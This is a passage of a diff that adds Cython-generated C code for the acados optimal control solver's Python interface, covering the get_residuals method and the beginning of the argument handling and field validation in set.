<<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &double_value) + * out[0] = double_value + */ + __Pyx_INCREF(__pyx_n_b_res_stat); + __pyx_v_field = __pyx_n_b_res_stat; + + /* "acados_template/acados_ocp_solver_pyx.pyx":473 + * + * field = "res_stat".encode('utf-8') + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &double_value) # <<<<<<<<<<<<<< + * out[0] = double_value + * + */ + __pyx_t_11 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_11) && PyErr_Occurred())) __PYX_ERR(0, 473, __pyx_L1_error) + ocp_nlp_get(__pyx_v_self->nlp_config, __pyx_v_self->nlp_solver, __pyx_t_11, ((void *)(&__pyx_v_double_value))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":474 + * field = "res_stat".encode('utf-8') + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &double_value) + * out[0] = double_value # <<<<<<<<<<<<<< + * + * field = "res_eq".encode('utf-8') + */ + __pyx_t_12 = 0; + __pyx_t_9 = -1; + if (__pyx_t_12 < 0) { + __pyx_t_12 += __pyx_pybuffernd_out.diminfo[0].shape; + if (unlikely(__pyx_t_12 < 0)) __pyx_t_9 = 0; + } else if (unlikely(__pyx_t_12 >= __pyx_pybuffernd_out.diminfo[0].shape)) __pyx_t_9 = 0; + if (unlikely(__pyx_t_9 != -1)) { + __Pyx_RaiseBufferIndexError(__pyx_t_9); + __PYX_ERR(0, 474, __pyx_L1_error) + } + *__Pyx_BufPtrStrided1d(__pyx_t_5numpy_float64_t *, __pyx_pybuffernd_out.rcbuffer->pybuffer.buf, __pyx_t_12, __pyx_pybuffernd_out.diminfo[0].strides) = __pyx_v_double_value; + + /* "acados_template/acados_ocp_solver_pyx.pyx":476 + * out[0] = double_value + * + * field = "res_eq".encode('utf-8') # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &double_value) + * out[1] = double_value + */ + __Pyx_INCREF(__pyx_n_b_res_eq); + __Pyx_DECREF_SET(__pyx_v_field, __pyx_n_b_res_eq); + + /* "acados_template/acados_ocp_solver_pyx.pyx":477 + * + * field = "res_eq".encode('utf-8') + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &double_value) # <<<<<<<<<<<<<< + * out[1] = double_value + * + */ + __pyx_t_11 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_11) && PyErr_Occurred())) __PYX_ERR(0, 477, __pyx_L1_error) + ocp_nlp_get(__pyx_v_self->nlp_config, __pyx_v_self->nlp_solver, __pyx_t_11, ((void *)(&__pyx_v_double_value))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":478 + * field = "res_eq".encode('utf-8') + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &double_value) + * out[1] = double_value # <<<<<<<<<<<<<< + * + * field = "res_ineq".encode('utf-8') + */ + __pyx_t_12 = 1; + __pyx_t_9 = -1; + if (__pyx_t_12 < 0) { + __pyx_t_12 += __pyx_pybuffernd_out.diminfo[0].shape; + if (unlikely(__pyx_t_12 < 0)) __pyx_t_9 = 0; + } else if (unlikely(__pyx_t_12 >= __pyx_pybuffernd_out.diminfo[0].shape)) __pyx_t_9 = 0; + if (unlikely(__pyx_t_9 != -1)) { + __Pyx_RaiseBufferIndexError(__pyx_t_9); + __PYX_ERR(0, 478, __pyx_L1_error) + } + *__Pyx_BufPtrStrided1d(__pyx_t_5numpy_float64_t *, __pyx_pybuffernd_out.rcbuffer->pybuffer.buf, __pyx_t_12, __pyx_pybuffernd_out.diminfo[0].strides) = __pyx_v_double_value; + + /* "acados_template/acados_ocp_solver_pyx.pyx":480 + * out[1] = double_value + * + * field = "res_ineq".encode('utf-8') # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &double_value) + * out[2] = double_value + */ + __Pyx_INCREF(__pyx_n_b_res_ineq); + __Pyx_DECREF_SET(__pyx_v_field, __pyx_n_b_res_ineq); + + /* "acados_template/acados_ocp_solver_pyx.pyx":481 + * + * field = "res_ineq".encode('utf-8') + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &double_value) # <<<<<<<<<<<<<< + * out[2] = double_value + * + */ + __pyx_t_11 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_11) && PyErr_Occurred())) __PYX_ERR(0, 481, __pyx_L1_error) + ocp_nlp_get(__pyx_v_self->nlp_config, __pyx_v_self->nlp_solver, __pyx_t_11, ((void *)(&__pyx_v_double_value))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":482 + * field = "res_ineq".encode('utf-8') + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &double_value) + * out[2] = double_value # <<<<<<<<<<<<<< + * + * field = "res_comp".encode('utf-8') + */ + __pyx_t_12 = 2; + __pyx_t_9 = -1; + if (__pyx_t_12 < 0) { + __pyx_t_12 += __pyx_pybuffernd_out.diminfo[0].shape; + if (unlikely(__pyx_t_12 < 0)) __pyx_t_9 = 0; + } else if (unlikely(__pyx_t_12 >= __pyx_pybuffernd_out.diminfo[0].shape)) __pyx_t_9 = 0; + if (unlikely(__pyx_t_9 != -1)) { + __Pyx_RaiseBufferIndexError(__pyx_t_9); + __PYX_ERR(0, 482, __pyx_L1_error) + } + *__Pyx_BufPtrStrided1d(__pyx_t_5numpy_float64_t *, __pyx_pybuffernd_out.rcbuffer->pybuffer.buf, __pyx_t_12, __pyx_pybuffernd_out.diminfo[0].strides) = __pyx_v_double_value; + + /* "acados_template/acados_ocp_solver_pyx.pyx":484 + * out[2] = double_value + * + * field = "res_comp".encode('utf-8') # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &double_value) + * out[3] = double_value + */ + __Pyx_INCREF(__pyx_n_b_res_comp); + __Pyx_DECREF_SET(__pyx_v_field, __pyx_n_b_res_comp); + + /* "acados_template/acados_ocp_solver_pyx.pyx":485 + * + * field = "res_comp".encode('utf-8') + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &double_value) # <<<<<<<<<<<<<< + * out[3] = double_value + * + */ + __pyx_t_11 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_11) && PyErr_Occurred())) __PYX_ERR(0, 485, __pyx_L1_error) + ocp_nlp_get(__pyx_v_self->nlp_config, __pyx_v_self->nlp_solver, __pyx_t_11, ((void *)(&__pyx_v_double_value))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":486 + * field = "res_comp".encode('utf-8') + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &double_value) + * out[3] = double_value # <<<<<<<<<<<<<< + * + * return out + */ + __pyx_t_12 = 3; + __pyx_t_9 = -1; + if (__pyx_t_12 < 0) { + __pyx_t_12 += __pyx_pybuffernd_out.diminfo[0].shape; + if (unlikely(__pyx_t_12 < 0)) __pyx_t_9 = 0; + } else if (unlikely(__pyx_t_12 >= __pyx_pybuffernd_out.diminfo[0].shape)) __pyx_t_9 = 0; + if (unlikely(__pyx_t_9 != -1)) { + __Pyx_RaiseBufferIndexError(__pyx_t_9); + __PYX_ERR(0, 486, __pyx_L1_error) + } + *__Pyx_BufPtrStrided1d(__pyx_t_5numpy_float64_t *, __pyx_pybuffernd_out.rcbuffer->pybuffer.buf, __pyx_t_12, __pyx_pybuffernd_out.diminfo[0].strides) = __pyx_v_double_value; + + /* "acados_template/acados_ocp_solver_pyx.pyx":488 + * out[3] = double_value + * + * return out # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_out); + __pyx_r = ((PyObject *)__pyx_v_out); + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":460 + * + * + * def get_residuals(self, recompute=False): # <<<<<<<<<<<<<< + * """ + * Returns an array of the form [res_stat, res_eq, res_ineq, res_comp]. + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + { PyObject *__pyx_type, *__pyx_value, *__pyx_tb; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&__pyx_type, &__pyx_value, &__pyx_tb); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_out.rcbuffer->pybuffer); + __Pyx_ErrRestore(__pyx_type, __pyx_value, __pyx_tb);} + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.get_residuals", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + goto __pyx_L2; + __pyx_L0:; + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_out.rcbuffer->pybuffer); + __pyx_L2:; + __Pyx_XDECREF((PyObject *)__pyx_v_out); + __Pyx_XDECREF(__pyx_v_field); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":492 + * + * # Note: this function should not be used anymore, better use cost_set, constraints_set + * def set(self, int stage, str field_, value_): # <<<<<<<<<<<<<< + * + * """ + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_35set(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_34set, "\n Set numerical data inside the solver.\n\n :param stage: integer corresponding to shooting node\n :param field: string in ['x', 'u', 'pi', 'lam', 't', 'p']\n\n .. note:: regarding lam, t: \n\n the inequalities are internally organized in the following order: \n\n [ lbu lbx lg lh lphi ubu ubx ug uh uphi; \n\n lsbu lsbx lsg lsh lsphi usbu usbx usg ush usphi]\n\n .. note:: pi: multipliers for dynamics equality constraints \n\n lam: multipliers for inequalities \n\n t: slack variables corresponding to evaluation of all inequalities (at the solution) \n\n sl: slack variables of soft lower inequality constraints \n\n su: slack variables of soft upper inequality constraints \n\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_35set = {"set", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_35set, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_34set}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_35set(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + int __pyx_v_stage; + PyObject *__pyx_v_field_ = 0; + PyObject *__pyx_v_value_ = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("set (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_stage,&__pyx_n_s_field_2,&__pyx_n_s_value,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_stage)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 492, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_field_2)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 492, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("set", 1, 3, 3, 1); __PYX_ERR(0, 492, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_value)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 492, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("set", 1, 3, 3, 2); __PYX_ERR(0, 492, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "set") < 0)) __PYX_ERR(0, 492, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 3)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + } + __pyx_v_stage = __Pyx_PyInt_As_int(values[0]); if (unlikely((__pyx_v_stage == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 492, __pyx_L3_error) + __pyx_v_field_ = ((PyObject*)values[1]); + __pyx_v_value_ = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("set", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 492, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.set", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_field_), (&PyUnicode_Type), 1, "field_", 1))) __PYX_ERR(0, 492, __pyx_L1_error) + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_34set(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_stage, __pyx_v_field_, __pyx_v_value_); + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = NULL; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_34set(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, int __pyx_v_stage, PyObject *__pyx_v_field_, PyObject *__pyx_v_value_) { + PyObject *__pyx_v_cost_fields = NULL; + PyObject *__pyx_v_constraints_fields = NULL; + PyObject *__pyx_v_out_fields = NULL; + PyObject *__pyx_v_mem_fields = NULL; + PyObject *__pyx_v_field = NULL; + PyArrayObject *__pyx_v_value = 0; + PyObject *__pyx_v_dims = NULL; + PyObject *__pyx_v_msg = NULL; + __Pyx_LocalBuf_ND __pyx_pybuffernd_value; + __Pyx_Buffer __pyx_pybuffer_value; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyArrayObject *__pyx_t_6 = NULL; + int __pyx_t_7; + char *__pyx_t_8; + npy_intp *__pyx_t_9; + int __pyx_t_10; + char const *__pyx_t_11; + char const *__pyx_t_12; + char const *__pyx_t_13; + char const *__pyx_t_14; + char const *__pyx_t_15; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("set", 0); + __pyx_pybuffer_value.pybuffer.buf = NULL; + __pyx_pybuffer_value.refcount = 0; + __pyx_pybuffernd_value.data = NULL; + __pyx_pybuffernd_value.rcbuffer = &__pyx_pybuffer_value; + + /* "acados_template/acados_ocp_solver_pyx.pyx":511 + * su: slack variables of soft upper inequality constraints \n + * """ + * cost_fields = ['y_ref', 'yref'] # <<<<<<<<<<<<<< + * constraints_fields = ['lbx', 'ubx', 'lbu', 'ubu'] + * out_fields = ['x', 'u', 'pi', 'lam', 't', 'z', 'sl', 'su'] + */ + __pyx_t_1 = PyList_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 511, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_u_y_ref); + __Pyx_GIVEREF(__pyx_n_u_y_ref); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_u_y_ref); + __Pyx_INCREF(__pyx_n_u_yref); + __Pyx_GIVEREF(__pyx_n_u_yref); + PyList_SET_ITEM(__pyx_t_1, 1, __pyx_n_u_yref); + __pyx_v_cost_fields = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":512 + * """ + * cost_fields = ['y_ref', 'yref'] + * constraints_fields = ['lbx', 'ubx', 'lbu', 'ubu'] # <<<<<<<<<<<<<< + * out_fields = ['x', 'u', 'pi', 'lam', 't', 'z', 'sl', 'su'] + * mem_fields = ['xdot_guess', 'z_guess'] + */ + __pyx_t_1 = PyList_New(4); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 512, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_u_lbx); + __Pyx_GIVEREF(__pyx_n_u_lbx); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_u_lbx); + __Pyx_INCREF(__pyx_n_u_ubx); + __Pyx_GIVEREF(__pyx_n_u_ubx); + PyList_SET_ITEM(__pyx_t_1, 1, __pyx_n_u_ubx); + __Pyx_INCREF(__pyx_n_u_lbu); + __Pyx_GIVEREF(__pyx_n_u_lbu); + PyList_SET_ITEM(__pyx_t_1, 2, __pyx_n_u_lbu); + __Pyx_INCREF(__pyx_n_u_ubu); + __Pyx_GIVEREF(__pyx_n_u_ubu); + PyList_SET_ITEM(__pyx_t_1, 3, __pyx_n_u_ubu); + __pyx_v_constraints_fields = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":513 + * cost_fields = ['y_ref', 'yref'] + * constraints_fields = ['lbx', 'ubx', 'lbu', 'ubu'] + * out_fields = ['x', 'u', 'pi', 'lam', 't', 'z', 'sl', 'su'] # <<<<<<<<<<<<<< + * mem_fields = ['xdot_guess', 'z_guess'] + * + */ + __pyx_t_1 = PyList_New(8); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 513, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_u_x); + __Pyx_GIVEREF(__pyx_n_u_x); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_u_x); + __Pyx_INCREF(__pyx_n_u_u); + __Pyx_GIVEREF(__pyx_n_u_u); + PyList_SET_ITEM(__pyx_t_1, 1, __pyx_n_u_u); + __Pyx_INCREF(__pyx_n_u_pi); + __Pyx_GIVEREF(__pyx_n_u_pi); + PyList_SET_ITEM(__pyx_t_1, 2, __pyx_n_u_pi); + __Pyx_INCREF(__pyx_n_u_lam); + __Pyx_GIVEREF(__pyx_n_u_lam); + PyList_SET_ITEM(__pyx_t_1, 3, __pyx_n_u_lam); + __Pyx_INCREF(__pyx_n_u_t); + __Pyx_GIVEREF(__pyx_n_u_t); + PyList_SET_ITEM(__pyx_t_1, 4, __pyx_n_u_t); + __Pyx_INCREF(__pyx_n_u_z); + __Pyx_GIVEREF(__pyx_n_u_z); + PyList_SET_ITEM(__pyx_t_1, 5, __pyx_n_u_z); + __Pyx_INCREF(__pyx_n_u_sl); + __Pyx_GIVEREF(__pyx_n_u_sl); + PyList_SET_ITEM(__pyx_t_1, 6, __pyx_n_u_sl); + __Pyx_INCREF(__pyx_n_u_su); + __Pyx_GIVEREF(__pyx_n_u_su); + PyList_SET_ITEM(__pyx_t_1, 7, __pyx_n_u_su); + __pyx_v_out_fields = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":514 + * constraints_fields = ['lbx', 'ubx', 'lbu', 'ubu'] + * out_fields = ['x', 'u', 'pi', 'lam', 't', 'z', 'sl', 'su'] + * mem_fields = ['xdot_guess', 'z_guess'] # <<<<<<<<<<<<<< + * + * field = field_.encode('utf-8') + */ + __pyx_t_1 = PyList_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_u_xdot_guess); + __Pyx_GIVEREF(__pyx_n_u_xdot_guess); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_u_xdot_guess); + __Pyx_INCREF(__pyx_n_u_z_guess); + __Pyx_GIVEREF(__pyx_n_u_z_guess); + PyList_SET_ITEM(__pyx_t_1, 1, __pyx_n_u_z_guess); + __pyx_v_mem_fields = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":516 + * mem_fields = ['xdot_guess', 'z_guess'] + * + * field = field_.encode('utf-8') # <<<<<<<<<<<<<< + * + * cdef cnp.ndarray[cnp.float64_t, ndim=1] value = np.ascontiguousarray(value_, dtype=np.float64) + */ + if (unlikely(__pyx_v_field_ == Py_None)) { + PyErr_Format(PyExc_AttributeError, "'NoneType' object has no attribute '%.30s'", "encode"); + __PYX_ERR(0, 516, __pyx_L1_error) + } + __pyx_t_1 = PyUnicode_AsUTF8String(__pyx_v_field_); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 516, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_field = __pyx_t_1; + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":518 + * field = field_.encode('utf-8') + * + * cdef cnp.ndarray[cnp.float64_t, ndim=1] value = np.ascontiguousarray(value_, dtype=np.float64) # <<<<<<<<<<<<<< + * + * # treat parameters separately + */ + __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_np); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 518, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_ascontiguousarray); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 518, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = PyTuple_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 518, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_v_value_); + __Pyx_GIVEREF(__pyx_v_value_); + PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_value_); + __pyx_t_3 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 518, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_np); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 518, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_float64); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 518, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_dtype, __pyx_t_5) < 0) __PYX_ERR(0, 518, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_2, __pyx_t_1, __pyx_t_3); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 518, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + if (!(likely(((__pyx_t_5) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_5, __pyx_ptype_5numpy_ndarray))))) __PYX_ERR(0, 518, __pyx_L1_error) + __pyx_t_6 = ((PyArrayObject *)__pyx_t_5); + { + __Pyx_BufFmt_StackElem __pyx_stack[1]; + if (unlikely(__Pyx_GetBufferAndValidate(&__pyx_pybuffernd_value.rcbuffer->pybuffer, (PyObject*)__pyx_t_6, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_STRIDES, 1, 0, __pyx_stack) == -1)) { + __pyx_v_value = ((PyArrayObject *)Py_None); __Pyx_INCREF(Py_None); __pyx_pybuffernd_value.rcbuffer->pybuffer.buf = NULL; + __PYX_ERR(0, 518, __pyx_L1_error) + } else {__pyx_pybuffernd_value.diminfo[0].strides = __pyx_pybuffernd_value.rcbuffer->pybuffer.strides[0]; __pyx_pybuffernd_value.diminfo[0].shape = __pyx_pybuffernd_value.rcbuffer->pybuffer.shape[0]; + } + } + __pyx_t_6 = 0; + __pyx_v_value = ((PyArrayObject *)__pyx_t_5); + __pyx_t_5 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":521 + * + * # treat parameters separately + * if field_ == 'p': # <<<<<<<<<<<<<< + * assert acados_solver.acados_update_params(self.capsule, stage, value.data, value.shape[0]) == 0 + * else: + */ + __pyx_t_7 = (__Pyx_PyUnicode_Equals(__pyx_v_field_, __pyx_n_u_p, Py_EQ)); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 521, __pyx_L1_error) + if (__pyx_t_7) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":522 + * # treat parameters separately + * if field_ == 'p': + * assert acados_solver.acados_update_params(self.capsule, stage, value.data, value.shape[0]) == 0 # <<<<<<<<<<<<<< + * else: + * if field_ not in constraints_fields + cost_fields + out_fields: + */ + #ifndef CYTHON_WITHOUT_ASSERTIONS + if (unlikely(__pyx_assertions_enabled())) { + __pyx_t_8 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_value)); if (unlikely(__pyx_t_8 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 522, __pyx_L1_error) + __pyx_t_9 = __pyx_f_5numpy_7ndarray_5shape_shape(((PyArrayObject *)__pyx_v_value)); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 522, __pyx_L1_error) + __pyx_t_7 = (long_acados_update_params(__pyx_v_self->capsule, __pyx_v_stage, ((double *)__pyx_t_8), (__pyx_t_9[0])) == 0); + if (unlikely(!__pyx_t_7)) { + __Pyx_Raise(__pyx_builtin_AssertionError, 0, 0, 0); + __PYX_ERR(0, 522, __pyx_L1_error) + } + } + #else + if ((1)); else __PYX_ERR(0, 522, __pyx_L1_error) + #endif + + /* "acados_template/acados_ocp_solver_pyx.pyx":521 + * + * # treat parameters separately + * if field_ == 'p': # <<<<<<<<<<<<<< + * assert acados_solver.acados_update_params(self.capsule, stage, value.data, value.shape[0]) == 0 + * else: + */ + goto __pyx_L3; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":524 + * assert acados_solver.acados_update_params(self.capsule, stage, value.data, value.shape[0]) == 0 + * else: + * if field_ not in constraints_fields + cost_fields + out_fields: # <<<<<<<<<<<<<< + * raise Exception("AcadosOcpSolverCython.set(): {} is not a valid argument.\ + * \nPossible values are {}. Exiting.".format(field, \ + */ + /*else*/ { + __pyx_t_5 = PyNumber_Add(__pyx_v_constraints_fields, __pyx_v_cost_fields); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 524, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_3 = PyNumber_Add(__pyx_t_5, __pyx_v_out_fields); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 524, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_7 = (__Pyx_PySequence_ContainsTF(__pyx_v_field_, __pyx_t_3, Py_NE)); 